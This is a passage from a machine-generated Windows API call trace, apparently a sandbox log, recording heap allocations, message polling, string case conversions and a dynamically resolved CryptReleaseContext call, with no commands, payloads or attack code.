lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0199.882] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0199.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.882] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.882] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.883] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.883] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0199.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.884] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0199.884] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0199.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.885] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.886] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.886] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.886] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0199.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0199.888] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0199.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.888] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0199.889] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0199.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0199.889] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.889] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0199.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0199.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0199.891] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0199.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0199.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0199.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0199.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0199.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0199.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0199.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0199.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0199.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.893] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0199.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0199.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0199.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.893] CryptReleaseContext (hProv=0xad63f8, dwFlags=0x0) returned 1 [0199.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.894] RtlAllocateHeap (HeapHandle=0x25c0000, 